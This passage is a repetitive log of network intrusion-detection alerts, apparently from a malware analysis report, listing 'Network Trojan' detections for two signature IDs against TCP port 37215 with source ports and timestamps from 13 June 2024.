              SID:2835222
              Source Port:51768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544018
              SID:2835222
              Source Port:41778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751906
              SID:2835222
              Source Port:46354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801448
              SID:2829579
              Source Port:60040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056864
              SID:2829579
              Source Port:35796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889112
              SID:2835222
              Source Port:42630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480890
              SID:2835222
              Source Port:55786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823295
              SID:2829579
              Source Port:57952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376784
              SID:2835222
              Source Port:36070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094771
              SID:2835222
              Source Port:40778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726034
              SID:2835222
              Source Port:32904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108005
              SID:2829579
              Source Port:52224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129861
              SID:2835222
              Source Port:50528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227544
              SID:2829579
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565576
              SID:2835222
              Source Port:35412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248467
              SID:2835222
              Source Port:35762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111199
              SID:2829579
              Source Port:34598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973858
              SID:2835222
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304236
              SID:2835222
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357699
              SID:2835222
              Source Port:57820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133543
              SID:2829579
              Source Port:53092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508245
              SID:2835222
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613664
              SID:2829579
              Source Port:58648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706839
              SID:2835222
              Source Port:58716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177374
              SID:2829579
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076312
              SID:2835222
              Source Port:42564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107609
              SID:2829579
              Source Port:46010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401076
              SID:2835222
              Source Port:47722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696063
              SID:2835222
              Source Port:55866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158664
              SID:2829579
              Source Port:56936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478314
              SID:2835222
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611921
              SID:2835222
              Source Port:38042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419999
              SID:2829579
              Source Port:43070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027438
              SID:2835222
              Source Port:38144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728124
              SID:2829579
              Source Port:34204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908975
              SID:2829579
              Source Port:53596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710385
              SID:2829579
              Source Port:55350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786317
              SID:2835222
              Source Port:34714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402784
              SID:2829579
              Source Port:48360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091236
              SID:2835222
              Source Port:55930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132899
              SID:2829579
              Source Port:49700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401934
              SID:2829579
              Source Port:49600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298853
              SID:2829579
              Source Port:50832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710352
              SID:2829579
              Source Port:53632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416901
              SID:2829579
              Source Port:48522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157234
              SID:2835222
              Source Port:46794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991036
              SID:2829579
              Source Port:49330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245198
              SID:2835222
              Source Port:42696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085947
              SID:2829579
              Source Port:34536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695425
              SID:2835222
              Source Port:41658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277854
              SID:2829579
              Source Port:44322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.061042
              SID:2835222
              Source Port:48298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487511
              SID:2835222
              Source Port:45242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298132
              SID:2829579
              Source Port:39270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872409
              SID:2829579
              Source Port:37684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.242064
              SID:2835222
              Source Port:50112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970678
              SID:2829579
              Source Port:35814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042099
              SID:2835222
              Source Port:46386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258272
              SID:2835222
              Source Port:43900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215431
              SID:2829579
              Source Port:40294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268913
              SID:2829579
              Source Port:34290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711479
              SID:2829579
              Source Port:37286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155758
              SID:2835222
              Source Port:34822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041562
              SID:2835222
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192872
              SID:2835222
              Source Port:42500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801605
              SID:2829579
              Source Port:55740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156371
              SID:2829579
              Source Port:35516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100777
              SID:2835222
              Source Port:53090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150371
              SID:2829579
              Source Port:47100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374013
              SID:2835222
              Source Port:38356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195185
              SID:2829579
              Source Port:59770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711284
              SID:2829579
              Source Port:54920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304884
              SID:2829579
              Source Port:58976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210584
              SID:2835222
              Source Port:37126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476297
              SID:2829579
              Source Port:34982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276089
              SID:2835222
              Source Port:41634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911500
              SID:2829579
              Source Port:40036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174784
              SID:2835222
              Source Port:45240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156853
              SID:2835222
              Source Port:47688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181451
              SID:2835222
              Source Port:43848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695385
              SID:2829579
              Source Port:39258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372158
              SID:2835222
              Source Port:46830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258672
              SID:2829579
              Source Port:50584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215908
              SID:2829579
              Source Port:45020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909554
              SID:2835222
              Source Port:42014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224399
              SID:2835222
              Source Port:40362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357114
              SID:2835222
              Source Port:52488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566822
              SID:2829579
              Source Port:41096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165019
              SID:2829579
              Source Port:38682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124517
              SID:2829579
              Source Port:55584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993785
              SID:2835222
              Source Port:40862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671857
              SID:2835222
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269241
              SID:2835222
              Source Port:38438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552762
              SID:2835222
              Source Port:54762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823847
              SID:2835222
              Source Port:47436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749810
              SID:2829579
              Source Port:41462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060701
              SID:2829579
              Source Port:32954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.113793
              SID:2835222
              Source Port:41852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089977
              SID:2835222
              Source Port:35968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630311
              SID:2835222
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788962
              SID:2835222
              Source Port:60864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438035
              SID:2835222
              Source Port:56060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195337
              SID:2835222
              Source Port:56194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508214
              SID:2829579
              Source Port:48294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678591
              SID:2835222
              Source Port:54552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110278
              SID:2829579
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348912
              SID:2829579
              Source Port:35914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107290
              SID:2835222
              Source Port:42010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629856
              SID:2835222
              Source Port:60184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221980
              SID:2829579
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545004
              SID:2829579
              Source Port:46152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750554
              SID:2835222
              Source Port:54680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695061
              SID:2835222
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270691
              SID:2829579
              Source Port:58816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728528
              SID:2829579
              Source Port:45104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176842
              SID:2835222
              Source Port:38384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867032
              SID:2835222
              Source Port:43610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820543
              SID:2835222
              Source Port:38700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724757
              SID:2835222
              Source Port:46740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038244
              SID:2835222
              Source Port:56610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509336
              SID:2835222
              Source Port:33046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192684
              SID:2835222
              Source Port:37218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210776
              SID:2835222
              Source Port:56328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565412
              SID:2835222
              Source Port:52848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756663
              SID:2829579
              Source Port:38084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453069
              SID:2835222
              Source Port:35516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177190
              SID:2829579
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439365
              SID:2835222
              Source Port:39604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672061
              SID:2835222
              Source Port:53956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678996
              SID:2835222
              Source Port:54172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175137
              SID:2829579
              Source Port:49668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092881
              SID:2835222
              Source Port:45614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.628959
              SID:2835222
              Source Port:39016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841466
              SID:2829579
              Source Port:53020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166466
              SID:2835222
              Source Port:59016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968963
              SID:2829579
              Source Port:49100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040984
              SID:2835222
              Source Port:35458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214469
              SID:2835222
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099410
              SID:2829579
              Source Port:43826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317106
              SID:2835222
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078824
              SID:2835222
              Source Port:55534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731468
              SID:2829579
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407303
              SID:2835222
              Source Port:59620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610057
              SID:2835222
              Source Port:58196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889053
              SID:2835222
              Source Port:57682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191631
              SID:2835222
              Source Port:46456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198381
              SID:2829579
              Source Port:54824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676512
              SID:2829579
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654550
              SID:2829579
              Source Port:43500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128549
              SID:2835222
              Source Port:49664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759392
              SID:2829579
              Source Port:60316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123344
              SID:2835222
              Source Port:59378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453861
              SID:2829579
              Source Port:45742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323258
              SID:2835222
              Source Port:41602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229177
              SID:2835222
              Source Port:43522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075114
              SID:2829579
              Source Port:58404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677085
              SID:2829579
              Source Port:51404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042636
              SID:2835222
              Source Port:33402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457978
              SID:2835222
              Source Port:59764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101632
              SID:2829579
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484534
              SID:2835222
              Source Port:56818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213420
              SID:2829579
              Source Port:51200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075673
              SID:2829579
              Source Port:47628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268235
              SID:2829579
              Source Port:42178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046271
              SID:2829579
              Source Port:41212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024086
              SID:2829579
              Source Port:56230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525473
              SID:2829579
              Source Port:53550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679340
              SID:2835222
              Source Port:50048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268500
              SID:2829579
              Source Port:46298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375107
              SID:2835222
              Source Port:34362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094027
              SID:2829579
              Source Port:57626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790432
              SID:2835222
              Source Port:34702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197302
              SID:2835222
              Source Port:32994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153099
              SID:2829579
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241321
              SID:2835222
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076969
              SID:2835222
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.319867
              SID:2829579
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508558
              SID:2829579
              Source Port:43174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567371
              SID:2835222
              Source Port:39416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060827
              SID:2829579
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993784
              SID:2835222
              Source Port:35404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102419
              SID:2829579
              Source Port:53374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216868
              SID:2835222
              Source Port:38672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868443
              SID:2829579
              Source Port:59478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152697
              SID:2835222
              Source Port:43916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307603
              SID:2835222
              Source Port:50936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193836
              SID:2835222
              Source Port:37866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886283
              SID:2835222
              Source Port:41946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694983
              SID:2835222
              Source Port:46670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409722
              SID:2835222
              Source Port:51500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569006
              SID:2835222
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088529
              SID:2835222
              Source Port:37106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213962
              SID:2829579
              Source Port:37936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181809
              SID:2835222
              Source Port:50424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195008
              SID:2835222
              Source Port:48684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440382
              SID:2835222
              Source Port:43712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546332
              SID:2835222
              Source Port:53534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610123
              SID:2829579
              Source Port:41170
              Destination Port:37215
